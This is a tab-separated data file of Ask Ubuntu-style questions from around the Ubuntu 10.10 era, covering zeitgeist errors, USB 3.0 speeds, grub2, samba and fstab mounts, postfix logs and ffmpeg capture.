24543	gnome activity journal does not show recently used files	i am running ubuntu 10.10 , and installed gnome activity journal . however it does not show any recently used files . i have attached a screenshot below . please note that gnome activity journal has been installed on the system for quite some time . so it is not that i recently installed and it still has to slowly gather data . also the zeitgeist-daemon is running in the background . would reinstalling zeitgeist help solve this problem ? if yes could you please provide a ppa where i can find the latest stable release of zeitgeist . update 1 : i tried uninstalling both zeitgeist and gnome activity journal , but still the problem persists . why is zeitgeist not gathering data ? update 2 : i checked the spikes in the month of december . but they were nothing . after proceeding to that month , the spike just went back to nothing just like the rest . update 3 : i checked the zeitgeist preferences . i have not blacklisted anything . going to check if deleting the database does anything . update 4 : i am glad to know that zeitgeist is collecting data but somehow it is not being shown in gaj . following one of the solutions below to purge the software and then reinstall it , i am no longer able to open gaj . however i can say that i could n't purge everything properly . when i tried the command sudo apt-get -- purge gnome-acitivity-journal it does n't work . when i try to open gaj now i get the following message in the terminal . ** message : pygobject_register_sinkfunc is deprecated ( gstobject ) traceback ( most recent call last ) : file `` /usr/bin/gnome-activity-journal '' , line 101 , in < module > from src.main import portalwindow file `` /usr/share/gnome-activity-journal/src/main.py '' , line 31 , in < module > from activity_widgets import multiviewcontainer , timelineviewcontainer , thumbviewcontainer file `` /usr/share/gnome-activity-journal/src/activity_widgets.py '' , line 39 , in < module > from store import contentstruct , client file `` /usr/share/gnome-activity-journal/src/store.py '' , line 539 , in < module > store = store ( ) file `` /usr/share/gnome-activity-journal/src/store.py '' , line 397 , in __init__ days_population = zeitgeistdbusinterface ( ) .get_extension ( `` log '' , `` journal/activity '' ) .gethistogramdata ( ) file `` /usr/local/lib/python2.6/dist-packages/zeitgeist/client.py '' , line 82 , in __getattr__ raise typeerror ( `` unknown method name : % s '' % name ) typeerror : unknown method name : gethistogramdata the thing is i used to get this error before . however i solved it by copying gnome_activity_journal.py to /home/krnekhelesh/.local/share/zeitgeist/extensions/ . but now that method does not seem to work . i also tried restarting the zeitgeist daemon but still the same problem . update 5 : i no longer get the error posted in update 4 . gnome activity journal opens but with the same problem as shown in the screenshot . the output of the terminal is ** message : pygobject_register_sinkfunc is deprecated ( gstobject ) activate activating example plugin activating blacklist manager update 6 : the recent documents is not disabled . i can view it perfectly under the places menu . also the file activity.sqlite was created again when i deleted it showing that zeitgeist is recording recent activity . update 7 : this is the most recent screenshot i 've inserted below , where it shows 8 items for one or two days . however when i click on that day , gaj does not show any recently used files . update 8 : i deleted ~.local/share/zeitgeist folder and then ran the command zeitgeist-datahub in the terminal . the output is as follows , traceback ( most recent call last ) : file `` /usr/bin/zeitgeist-datahub '' , line 33 , in < module > from _zeitgeist.loggers.zeitgeist_setup_service import dataproviderservice importerror : no module named loggers.zeitgeist_setup_service update 9 : version number of the zeitgeist components are the following , zeitgeist-core : 0.7.0 gnome-activity-journal : 0.6 zeitgeist-datahub : 0.5.2 update 10 : i completely removed gaj and zeitgeist and made sure the folders /usr/share/zeitgeist and /usr/local/share/zeitgeist were also clear before i reinstalled gaj again . on running gaj the windows did not appear . so i did the following . i typed zeitgeist-daemon -- replace and got the following output , traceback ( most recent call last ) : file `` /usr/local/bin/zeitgeist-daemon '' , line 38 , in < module > from _zeitgeist.engine import constants importerror : no module named _zeitgeist.engine and then i ran the command zeitgeist-datahub and got the following output , traceback ( most recent call last ) : file `` /usr/bin/zeitgeist-datahub '' , line 32 , in < module > from zeitgeist.client import zeitgeistdbusinterface file `` /usr/local/lib/python2.6/dist-packages/zeitgeist/client.py '' , line 35 , in < module > from zeitgeist.datamodel import ( event , subject , timerange , storagestate , file `` /usr/local/lib/python2.6/dist-packages/zeitgeist/datamodel.py '' , line 1116 , in < module > execfile ( os.path.join ( _config.datadir , `` zeitgeist/ontology/zeitgeist.py '' ) ) ioerror : [ errno 2 ] no such file or directory : '/usr/local/share/zeitgeist/ontology/zeitgeist.py' on checking synaptic manager , the version numbers are the same as stated before in update 9 . update 10 : it works ! ! ! ! ! ! here is what i did , as told by mhr , i uninstalled everything , used locate zeitgeist and removed everything . after which i also forced version 0.5.1 for zeitgeist-datahub . restarted and installed everything again . it works..however there is a small catch ! i have to first run the command zeitgeist-daemon -- replace and while this is running in the terminal , i can open gaj . otherwise it does not appear . if i dont run zeitgeist-daemon -- replace but run gaj in the terminal i get the following error messeage . traceback ( most recent call last ) : file `` /usr/bin/gnome-activity-journal '' , line 90 , in < module > client = zeitgeistclient ( ) file `` /usr/lib/pymodules/python2.6/zeitgeist/client.py '' , line 318 , in __init__ self._iface = zeitgeistdbusinterface ( ) file `` /usr/lib/pymodules/python2.6/zeitgeist/client.py '' , line 184 , in __init__ self.object_path ) file `` /usr/lib/pymodules/python2.6/dbus/bus.py '' , line 244 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/pymodules/python2.6/dbus/proxies.py '' , line 241 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/pymodules/python2.6/dbus/bus.py '' , line 183 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/pymodules/python2.6/dbus/bus.py '' , line 281 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/pymodules/python2.6/dbus/connection.py '' , line 620 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.execfailed : failed to execute program /usr/local/bin/zeitgeist-daemon : success other than this , it works perfectly . it nicely got the files i used today , the picture i worked with and everything . hope this helps . anyone ?
24544	what is the default vim colorscheme ?	i really like the default vim colorscheme in 10.10 but i ca n't figure out what it 's called -- i want to turn it on for my debian box as well .
24545	only one of two partitions on sd card is recognized	i split my sd card into 2 partitions . when i use usb-card-reader to read my sd card , only the one partition shows up on the screen , and the other does n't . i have run the command sudo fdisk -l and the result is the same -- only one partition is recognized . but i believe both partitions of my sd card work , because i can boot my single-board computer with the sd card and run some of the programs which are inside that `` unreadable '' partition . how can i access both partitions of my sd card ?
24549	italic text in steam under wine	running steam using wine . works perfectly except for a small error : all my text is italic for some reason . i 'm using the latest wine release 1.3.12 and ubuntu 10.10 thought i 'd try here first , if this would be more appropriate in a more wine oriented discussion i 'll be happy to move it .
24550	wifi works perfectly on windows , but drops on ubuntu	i have a dual-boot computer with windows xp on one partition and ubuntu 10.10 on the other . in windows xp i can connect to a hidden wireless network ( wpa-psk aes ) perfectly , and i was finally able to install the driver for the adapter on ubuntu ( rnx-n180ube , hardware id rtl8191su ) . it works fine when i first boot the computer and log in , but then after a few minutes the network suddenly stops working completely . if i try to reconnect it , the network manager claims to have connected , but in actuality it 's still down . at some points , i have been able to connect to a public network even while the private network did n't work , but that eventually would n't work at all either .
24551	solutions for cheaply replacing poorly-supported onboard ati card with discreet graphics on desktop machine ?	i have put ubuntu on my mum 's desktop computer . unfortunately , the open source radeon driver does not work well with the onboard ati graphics , and ati 's proprietary driver no longer supports the hardware at all . in order to use the ati proprietary driver with this hardware , it is necessary to use an older version of xorg , which is now only available in versions of ubuntu older than 8.10 . unfortunately , the open source radeon driver seems to be causing x to lock up intermittently when my mum uses audacity . i 'm willing to accept that some hardware is not well-supported on ubuntu , and so , because this is a desktop computer with a couple of free pci slots , i think a better solution might simply be to plug in a new graphics card that might have better driver support , and to disable the onboard ati card in the bios . the requirements for this card are that it be inexpensive and have robust ( preferably open source ) driver support in ubuntu 10.04 . heavy-duty graphics processing power is not a requirement . a second-hand card on ebay would also be fine . can anyone make some recommendations ?
24556	why wo n't usb 3.0 external hard drive run at usb 3.0 speeds ?	i recently purchased a pci express x1 usb 3.0 controller card ( containing the nec usb 3.0 controller ) with the intent of using a usb 3.0 external hard drive with my linux box . i installed the card in an empty pcie slot on my motherboard , connected the card to a power cable , strung a usb 3.0 cable between one of the new ports and my external hdd , and connected the hdd to a wall socket for power . booting the system , the drive works 100 % as intended , with the one exception of throughput : rather than using superspeed 4.8 gbps connectivity , it seems to be falling back to high speed 480 mbps usb 2.0-style throughput . disk utility shows it as a 480 mbps device , and running a couple disk utility and dd benchmarks confirms that the drive fails to exceed ~40 mb/s ( the approximate limit of usb 2.0 ) , despite it being an ssd capable of far more than that . when i connect my usb 3.0 hdd , dmesg shows this : [ 3923.280018 ] usb 3-2 : new high speed usb device using ehci_hcd and address 6 where i would expect to find this : [ 3923.280018 ] usb 3-2 : new superspeed usb device using xhci_hcd and address 6 my system was running on kernel 2.6.35-25-generic at the time . then , i stumbled upon this forum thread by an individual who found that a bug , which was present in kernels prior to 2.6.37-rc5 , could be the culprit for this type of problem . consequently , i installed the 2.6.37-generic mainline ubuntu kernel to determine if the problem would go away . it did n't , so i tried 2.6.38-rc3-generic , and even the 2.6.38 nightly from 2010.02.01 , to no avail . in short , i 'm trying to determine why , with usb 3.0 support in the kernel , my usb 3.0 drive fails to run at full superspeed throughput . see the comments under this question for additional details . output that might be relevant to the problem ( when booting from 2.6.38-rc3 ) : relevant lines from dmesg : [ 19.589491 ] xhci_hcd 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 19.589512 ] xhci_hcd 0000:03:00.0 : setting latency timer to 64 [ 19.589516 ] xhci_hcd 0000:03:00.0 : xhci host controller [ 19.589623 ] xhci_hcd 0000:03:00.0 : new usb bus registered , assigned bus number 12 [ 19.650492 ] xhci_hcd 0000:03:00.0 : irq 17 , io mem 0xf8100000 [ 19.650556 ] xhci_hcd 0000:03:00.0 : irq 47 for msi/msi-x [ 19.650560 ] xhci_hcd 0000:03:00.0 : irq 48 for msi/msi-x [ 19.650563 ] xhci_hcd 0000:03:00.0 : irq 49 for msi/msi-x [ 19.653946 ] xhci xhci_add_endpoint called for root hub [ 19.653948 ] xhci xhci_check_bandwidth called for root hub relevant section of sudo lspci -v : 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) ( prog-if 30 ) flags : bus master , fast devsel , latency 0 , irq 17 memory at f8100000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ 50 ] power management version 3 capabilities : [ 70 ] msi : enable- count=1/8 maskable- 64bit+ capabilities : [ 90 ] msi-x : enable+ count=8 masked- capabilities : [ a0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number ff-ff-ff-ff-ff-ff-ff-ff capabilities : [ 150 ] # 18 kernel driver in use : xhci_hcd kernel modules : xhci-hcd relevant section of sudo lsusb -v : bus 012 device 001 : id 1d6b:0003 linux foundation 3.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 3.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 3 bmaxpacketsize0 9 idvendor 0x1d6b linux foundation idproduct 0x0003 3.0 root hub bcddevice 2.06 imanufacturer 3 linux 2.6.38-020638rc3-generic xhci_hcd iproduct 2 xhci host controller iserial 1 0000:03:00.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 hub descriptor : blength 9 bdescriptortype 41 nnbrports 4 whubcharacteristic 0x0009 per-port power switching per-port overcurrent protection tt think time 8 fs bits bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power port 3 : 0000.0100 power port 4 : 0000.0100 power device status : 0x0003 self powered remote wakeup enabled full , non-verbose lsusb : bus 012 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 011 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 010 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 003 : id 04d9:0702 holtek semiconductor , inc . bus 009 device 002 : id 046d : c068 logitech , inc. g500 laser mouse bus 009 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 006 : id 174c:5106 asmedia technology inc . bus 003 device 004 : id 0bda:0151 realtek semiconductor corp. mass storage device ( multicard reader ) bus 003 device 002 : id 058f:6366 alcor micro corp. multi flash reader bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 006 : id 1687:0163 kingmax digital inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 046d:081b logitech , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub full output : full dmesg full lspci full lsusb
24558	where is the accessibility mouse click lock ?	i 've been a user of linux on the desktop off and on again over the years . i very nearly switched my primary computer to ubuntu prior to the release of windows 7 . there were a few , but significant issues at the time that prevented wholesale adoption , mostly tethering with my phone and lousy vpn client . one key component i could count on was the accessibility features . i have recently installed ubuntu 10.10 and am considering giving it another try , but it appears ubuntu has taken a leap backwards in that it no longer has a click lock feature for the mouse . basically i need the ability to press and hold the left button to trigger a locking of the button so i can move the mouse by way of a trackpoint with my prosthesis . i absolutely require this feature and it is a deal breaker if it wo n't work . i 've tried the dwell keys but this is a chaotic control at best . i 've never been able to manage a drag of any kind .
24561	what does `` missing recommends '' in synaptic package manager mean ?	in the synaptic package manager , under 'custom filters , ' what is the `` missing recommends ' entry ?
24564	installation-allocate drive space/boot loader	when i try to install ubuntu 10.10 from the official livedisc i got in the mail , when i get to the `` allocate disk space '' step i can not get it to work . i shrank my win7 partition so i have unallocated space , then i tried using the space while it is formatted in ntfs , but the partitions will not show up in the box . /dev/sda is selected under boot loader , and i ca n't select anything else , but the partition box is blank so when i click `` install ubuntu '' it just says : `` no root file system is defined . please correct this from the partitioning menu . '' -i am trying to dual-boot win7 and ubuntu , but i was never asked in the install process whether i would like to install just ubuntu or dual-boot ?
24569	recommendations for a wireless-n usb dongle ?	please advise which wireless-n usb adapters should work seamlessly with ubuntu 10.04 . i have tried smc and linksys , but they all need to have drivers compiled for them .
24574	how can i stop ubuntu from automatically unmounting samba shares ?	i have some music files i 'd like to listen to sitting on a samba share . i added this share via the ubuntu gui ( places - > connect to server ... ) , and everything worked just fine . however , despite the fact that my music file is playing from this location , after i 've not touched the location using the nautilus gui , ubuntu/gnome decides that i 'm not using the share anymore and terminates the connection . thus , my music stops playing and rhythmbox is unhappy with me . simply clicking on the new shortcut the `` connect to server ... '' bit created for me immediately makes the files come back again and allows me to restart the music playing . how can i have ubuntu not automatically dismount samba shares ?
24575	configuration of mail server to relay emails	this is part of a project wherein i have to send mail ... i have a mail-server with domain abc.com . how do i allow that mail-server to receive mail from another domain , cde.com ? and how do i transfer all mail to the root user ? for the first question , i think i need the mail-server configured in open relay . using postfix , the default configuration is for open relay ... right ?
24576	how to install ubuntu using cli commands from a live cd ?	i was wondering if there is any way of installing ubuntu from command line using the ubuntu live cd . i am aware of the alternate cd text install , but just wanted to know if its possible to do so from the live cd installer .
24577	i am getting a blank screen after opening the laptop lid ( resume from standby )	i am using ubuntu 10.10 maverick meerkat . i am getting a blank screen after opening the lid of my ibm r51 thinkpad , which forces me to restart the system . suspend mode is not working in my laptop . please help me to resolve this issue .
24580	bug unsubscribing from ubuntu one mobile	i have an ubuntu one mobile subscription , which i can see in my subscriptions page : one.ubuntu.com/account/subscription/756082 i no longer need my ubuntu one mobile subscription , so click the link to cancel the mobile service subscription : one.ubuntu.com/account/cancel/756082/ then confirm that request to cancel : one.ubuntu.com/account/cancel/756082/confirm/ but the process ends there showing a `` something has gone wrong page '' , and my subscription remains active : ( the same problem occurred when i attempted the same a few weeks back , so not a temporary problem i 'm thinking . any input gratefully received . i would like to report this problem directly to the maintainer of this part of the ubuntu site but can not see how to do that .
24586	how to always show the menu in grub2 ?	installing ubuntu 10.10 i get the grub2 boot manager . by default is does instant booting of the first entry , i.e . you have to hold the shift key while booting when you want to enter the menu . how can i disable this behavior ? i mean , how can i configure grub2 such that it always displays its menu and uses perhaps a timeout of 5 seconds for the first entry ?
24592	postfix log ... . spam attempt ?	i have some weird entries in my mail.log . what i 'd like to ask is if postfix is avoiding correctly ( according with the main.cf attached below ) what seems to be relay attempts , presumably for spamming , or if i can enhance it 's security somehow . feb 2 11:53:25 myserver postfix/smtpd [ 9094 ] : connect from catv-80-99-46-143.catv.broadband.hu [ 80.99.46.143 ] feb 2 11:53:25 myserver postfix/smtpd [ 9094 ] : warning : non-smtp command from catv-80-99-46-143.catv.broadband.hu [ 80.99.46.143 ] : get / http/1.1 feb 2 11:53:25 myserver postfix/smtpd [ 9094 ] : disconnect from catv-80-99-46-143.catv.broadband.hu [ 80.99.46.143 ] feb 2 11:56:45 myserver postfix/anvil [ 9097 ] : statistics : max connection rate 1/60s for ( smtp:80.99.46.143 ) at feb 2 11:53:25 feb 2 11:56:45 myserver postfix/anvil [ 9097 ] : statistics : max connection count 1 for ( smtp:80.99.46.143 ) at feb 2 11:53:25 feb 2 11:56:45 myserver postfix/anvil [ 9097 ] : statistics : max cache size 1 at feb 2 11:53:25 feb 2 12:09:19 myserver postfix/smtpd [ 9302 ] : connect from vs148181.vserver.de [ 62.75.148.181 ] feb 2 12:09:19 myserver postfix/smtpd [ 9302 ] : warning : non-smtp command from vs148181.vserver.de [ 62.75.148.181 ] : get / http/1.1 feb 2 12:09:19 myserver postfix/smtpd [ 9302 ] : disconnect from vs148181.vserver.de [ 62.75.148.181 ] feb 2 12:12:39 myserver postfix/anvil [ 9304 ] : statistics : max connection rate 1/60s for ( smtp:62.75.148.181 ) at feb 2 12:09:19 feb 2 12:12:39 myserver postfix/anvil [ 9304 ] : statistics : max connection count 1 for ( smtp:62.75.148.181 ) at feb 2 12:09:19 feb 2 12:12:39 myserver postfix/anvil [ 9304 ] : statistics : max cache size 1 at feb 2 12:09:19 feb 2 14:17:02 myserver postfix/smtpd [ 10847 ] : connect from unknown [ 202.46.129.123 ] feb 2 14:17:02 myserver postfix/smtpd [ 10847 ] : warning : non-smtp command from unknown [ 202.46.129.123 ] : get / http/1.1 feb 2 14:17:02 myserver postfix/smtpd [ 10847 ] : disconnect from unknown [ 202.46.129.123 ] feb 2 14:20:22 myserver postfix/anvil [ 10853 ] : statistics : max connection rate 1/60s for ( smtp:202.46.129.123 ) at feb 2 14:17:02 feb 2 14:20:22 myserver postfix/anvil [ 10853 ] : statistics : max connection count 1 for ( smtp:202.46.129.123 ) at feb 2 14:17:02 feb 2 14:20:22 myserver postfix/anvil [ 10853 ] : statistics : max cache size 1 at feb 2 14:17:02 feb 2 20:57:33 myserver postfix/smtpd [ 18452 ] : warning : 95.110.224.230 : hostname host230-224-110-95.serverdedicati.aruba.it verification failed : name or service not known feb 2 20:57:33 myserver postfix/smtpd [ 18452 ] : connect from unknown [ 95.110.224.230 ] feb 2 20:57:33 myserver postfix/smtpd [ 18452 ] : lost connection after connect from unknown [ 95.110.224.230 ] feb 2 20:57:33 myserver postfix/smtpd [ 18452 ] : disconnect from unknown [ 95.110.224.230 ] feb 2 21:00:53 myserver postfix/anvil [ 18455 ] : statistics : max connection rate 1/60s for ( smtp:95.110.224.230 ) at feb 2 20:57:33 feb 2 21:00:53 myserver postfix/anvil [ 18455 ] : statistics : max connection count 1 for ( smtp:95.110.224.230 ) at feb 2 20:57:33 feb 2 21:00:53 myserver postfix/anvil [ 18455 ] : statistics : max cache size 1 at feb 2 20:57:33 feb 2 21:13:44 myserver pop3d : connection , ip= [ : :ffff:219.94.190.222 ] feb 2 21:13:44 myserver pop3d : login failed , user=admin , ip= [ : :ffff:219.94.190.222 ] feb 2 21:13:50 myserver pop3d : login failed , user=test , ip= [ : :ffff:219.94.190.222 ] feb 2 21:13:56 myserver pop3d : login failed , user=danny , ip= [ : :ffff:219.94.190.222 ] feb 2 21:14:01 myserver pop3d : login failed , user=sharon , ip= [ : :ffff:219.94.190.222 ] feb 2 21:14:07 myserver pop3d : login failed , user=aron , ip= [ : :ffff:219.94.190.222 ] feb 2 21:14:12 myserver pop3d : login failed , user=alex , ip= [ : :ffff:219.94.190.222 ] feb 2 21:14:18 myserver pop3d : login failed , user=brett , ip= [ : :ffff:219.94.190.222 ] feb 2 21:14:24 myserver pop3d : login failed , user=mike , ip= [ : :ffff:219.94.190.222 ] feb 2 21:14:29 myserver pop3d : login failed , user=alan , ip= [ : :ffff:219.94.190.222 ] feb 2 21:14:35 myserver pop3d : login failed , user=info , ip= [ : :ffff:219.94.190.222 ] feb 2 21:14:41 myserver pop3d : login failed , user=shop , ip= [ : :ffff:219.94.190.222 ] feb 3 06:49:29 myserver postfix/smtpd [ 25834 ] : warning : 71.6.142.196 : hostname db4142196.aspadmin.net verification failed : name or service not known feb 3 06:49:29 myserver postfix/smtpd [ 25834 ] : connect from unknown [ 71.6.142.196 ] feb 3 06:49:29 myserver postfix/smtpd [ 25834 ] : lost connection after connect from unknown [ 71.6.142.196 ] feb 3 06:49:29 myserver postfix/smtpd [ 25834 ] : disconnect from unknown [ 71.6.142.196 ] feb 3 06:52:49 myserver postfix/anvil [ 25837 ] : statistics : max connection rate 1/60s for ( smtp:71.6.142.196 ) at feb 3 06:49:29 feb 3 06:52:49 myserver postfix/anvil [ 25837 ] : statistics : max connection count 1 for ( smtp:71.6.142.196 ) at feb 3 06:49:29 feb 3 06:52:49 myserver postfix/anvil [ 25837 ] : statistics : max cache size 1 at feb 3 06:49:29 i have postfix 2.7.1-1 running on ubuntu 10.10 . this is my ( modified por privacy ) main.cf : smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no append_dot_mydomain = no readme_directory = no smtpd_tls_cert_file = /etc/ssl/certs/smtpd.crt smtpd_tls_key_file = /etc/ssl/private/smtpd.key myhostname = mymailserver.org alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = mymailserver.org , myserver , localhost relayhost = mynetworks = 127.0.0.0/8 , 192.168.1.0/24 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = all home_mailbox = maildir/ smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination mailbox_command = smtpd_sasl_local_domain = smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_tls_security_level = may smtpd_tls_auth_only = no smtp_tls_note_starttls_offer = yes smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev : /dev/urandom smtp_tls_security_level = may
24593	how can i add screenshots of programs to the software center	some programs in the software center lack screenshots . is there a way to add them ? idea : it would be nice if there was some sort of button add screenshot under the `` no screenshot '' area
24594	`` lo : disabled privacy extensions '' and ipv6 disabling ?	there are lots of `` lo : disabled privacy extensions '' in var/log/messages . i googled and find it is ipv6 releated , so i tried to disable ipv6 . i added the following lines to /etc/sysctl.conf net.ipv6.conf.all.disable_ipv6=1 net.ipv6.conf.default.disable_ipv6=1 net.ipv6.conf.lo.disable_ipv6=1 and blacklist ipv6 to /etc/modprobe.d/blacklist.conf after that , i restarted the network by /etc/init.d/networking restart . my question is : the ip addr still shows inet6 address attached to eth0 in forms like inet6 fe80 : :212:79ff : fecf : edaf/64 scope link does it means my ipv6 not disabled ?
24599	search function in the terminal ?	i have written a program that outputs a lot of text to the terminal . i am looking for certain words in the text to see if i have done it right , but simply reading the text is impossible . are there any capabilities or commands that can actually enable me to lookup a word in the terminal ( like ctrl + f ) ?
24603	how to copy a dvd	i was offered a couple of dvds from abroad that can not be played on my player due to region filtering . so i tried k9copy to copy the dvd ( it removes the region automatically ) . but for some reasons the copy does not work well ( followed the instructions from here but the generated iso file does not work / not even in media player - additionally there are many bugs in k9copy 2.3.5 ( latest from ubuntu ) showing that it is not a reliable software , at least not on gnome ... ) . my question is simple : how to copy a dvd on ubuntu , the copy/iso being as close to the original , but without the region code .
24604	is it possible to add a notification message when a vpn gets connected ?	i 'm using ubuntu 10.04 and i use to connect to a pptp vpn , everything works perfectly , when i start my vpn connection i can see that the connection is in progress from the networkmanager icon , and i can see that the connection is on when the network icon gets the small lock . is it possible to add a notification ballon , like the one i see when the network connection is estabilished ? p.s if the connection fail or is dropped , the notification cames out like this :
24609	blacklisting packages from installing	i 'm currently running 10.10 with a package removed . i 'm concerned that when it comes time to upgrade , synaptic may well install that package again . is there way to blacklist a package that works even through distribution upgrades ? in my case , the package is mono .
24610	moving a lamp set up from 32 bit to 64 bit	i have setup an ubuntu server 10.10 32bit on an old dell d610 laptop for testing . i have the latest php , mysql and apache with wordpress installed . after the testing is over and once i finish adding material to my wordpress i will build a ubuntu 10.10 64bit vm on hyper-v. what i am wondering is , if it 's best practice to build everything from scratch ( which will take me more time and would like to avoid ) or transfer the database and all other settings ? if i choose to transfer how and what i need to do ? here 's where i 'd like some help as i am still an intermediate admin ( if i can call it that ! ) i am looking forward for your help . thanks !
24615	trying to configure samba share with office server	i 'm trying to set up fstab to automatically connect to my office shared server . i 'm undoubtedly doing something silly here as the username and password and server name work fine in the first code snippet below , just not the second - any help would be appreciated ! the following command works as expected ... tom @ tom-desktop : sudo /usr/bin/smbclient -l server.local -uguest enter guest 's password : domain= [ workgroup ] os= [ unix ] server= [ samba 3.0.10 ] sharename type comment -- -- -- -- - -- -- -- -- -- - lacie disk disk macosx server disk macosx ipc $ ipc ipc service ( server ) admin $ ipc ipc service ( server ) domain= [ workgroup ] os= [ unix ] server= [ samba 3.0.10 ] server comment -- -- -- -- - -- -- -- - acer-9d60040d10 server server workgroup master -- -- -- -- - -- -- -- - workgroup acer-9d60040d10 but when i add the following line to /etc/fstab , i get this error : cifs_mount failed w/return code = -22 //server.local/server /media/maguires cifs username=guest , password=password 0 0
24626	start up script , mounting and binding depending on if drives are present ?	what is the code to make a script run on startup that binds the home folders with other folders depending on if a drive is present ? because most of my files are kept in separate drives and places than /home/john/folder , i use terminal code to bind the home folders for different places . for example , i bind the /documents folder with /dropbox/documents so it 's constantly backed up . i 've found out how to do this through the terminal , and read somewhere that you can put code in the /etc/rc.local script and that that script ( rc.local ) runs on start up . i 've put the code into that script , but i 'm not sure how to get that to run on startup . right now i have to wait till the computer has started up , then run the code in the terminal . the full code in that script i 've set is below . sudo mount -o bind /media/storage/music ~/music & & sudo mount -o bind /media/storage/downloads ~/downloads & & sudo mount -o bind /media/2tb/videos ~/videos & & sudo mount -o bind /home/john/dropbox/documents ~/documents & & sudo mount -o bind /home/john/dropbox/photos ~/pictures & & exit 0 the exit 0 is needed for the script to run , according to a comment in the script . since this on a laptop and i keep my video files on an external drive , is there anyway to add a simple `` if is present , also bind ~/videos to /media//videos , '' and if it 's not , skip over it ? or put that code at the end so it does n't affect the above execution ?
24628	which log will tell me why my computer shut down ?	i was at school sshing to my homebox . all of a sudden , my connection was closed . attempting to reconnect failed . when i returned home , i discovered that my computer was off . nobody was at my house and i am sure that i did not have a power outage . how can i figure out how or why my computer shut off ? is there some log in /var/log that could point me in the right direction ? should there be a core dump somewhere that i should find ? if so , how do i use core dumps ?
24630	make error on kubuntu	when im running make for building oxygen-transparent theme , i receive the following error : kde @ wilsonzaizai-satellite-l510 : ~/oxygen-transparent/build $ sudo make install [ 0 % ] built target oxygentransparentstyle_automoc [ 5 % ] built target oxygentransparentstyle [ 5 % ] built target kwin3_oxygen_transparent_automoc [ 18 % ] built target kwin3_oxygen_transparent [ 18 % ] built target kwin_oxygen_transparent_config_automoc linking cxx shared module ../../lib/kwin_oxygen_transparent_config.so /usr/bin/ld : can not find -loxygenstyle collect2 : ld returned 1 exit status make [ 2 ] : *** [ lib/kwin_oxygen_transparent_config.so ] error 1 make [ 1 ] : *** [ decoration/config/cmakefiles/kwin_oxygen_transparent_config.dir/all ] error 2 make : *** [ all ] error 2 what is -loxygenstyle ?
24634	how to launch a real install of ubuntu already on another hard-drive in windows 7 like a vm	i 'm not too familiar with vms and the like so this may not even be possible . here is what i have : a real , full install of windows 7 on hard drive a . a real , full install of ubuntu 10.04 on hard drive b. grub allowing me to select what i want to launch when i start up my computer . it would be amazing if i could do one of two things . within windows 7 , launch my real install of ubuntu as if it were a vm . that means i would get all the installed software , all of the files , and all of the settings . launch a vm copy of ubuntu 10.04 but some how make it use all of the installed software and settings from my real copy . thanks !
24635	ffmpeg not recording audio during screen capture	i 'm using the script below to run ffmpeg on ubuntu 10.10 . i followed these instructions to install ffmpeg & x264 . while ffmpeg does capture the screen it does not capture the mic audio . i 've checked that the mic works via `` system preferences '' . anyone have any ideas on what the problem ( s ) could be and suggestions on how to resolve this issue ? thanks . ffmpeg -f alsa -ac 2 -i hw:0,0 -f x11grab -r 30 -s $ ( xwininfo -root | grep 'geometry ' | awk ' { print $ 2 ; } ' ) -i :0.0 -acodec pcm_s16le -vcodec libx264 -vpre lossless_ultrafast -threads 0 -y screen-capture.mkv
24638	ubuntu minimal and must have packages	i am planning on installing ubuntu from the minimal cd image so that i can install what i want to . any suggestions for must have packages that i should be installing ? like for example gnome is one . i am looking for personal experiences . should gnome be enough to get me up and running ?
